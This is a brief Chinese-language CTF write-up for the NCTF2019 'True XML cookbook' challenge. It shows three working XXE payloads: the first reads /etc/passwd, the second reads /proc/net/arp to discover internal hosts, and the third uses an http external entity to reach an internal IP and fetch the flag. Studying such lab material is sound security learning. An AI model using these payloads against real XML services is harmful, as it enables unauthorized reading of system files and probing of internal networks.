0%

[NCTF2019]True XML cookbook

还是比较简单的题目。

  1. 根据题目和抓包可以知道存在xxe漏洞。我们第一次post传入:
    1
    2
    3
    4
    5
    <?xml version="1.0" ?>
    <!DOCTYPE a[
    <!ENTITY name SYSTEM "file:///etc/passwd">]
    >
    <user><username>&name;</username><password>1</password></user>
    2. 我们看到有回显,但是参试寻找flag文件无果。
  2. 我通过读取/etc/hosts/proc/net/arp 得到C段的ip。
    1
    2
    3
    4
    5
    <?xml version="1.0" ?>
    <!DOCTYPE a[
    <!ENTITY name SYSTEM "file:///proc/net/arp" >]
    >
    <user><username>&name;</username><password>1</password></user>
  3. 我们直接使用http协议进行访问
    1
    2
    3
    4
    5
    <?xml version="1.0" ?>
    <!DOCTYPE a[
    <!ENTITY name SYSTEM "http://173.28.179.11" >]
    >
    <user><username>&name;</username><password>1</password></user>
    得到flag,其实c段需要我们猜直接爆破。
    这里主要还是学习/proc/net/arp/etc/hosts那个文件夹。

-------------本文结束感谢您的阅读-------------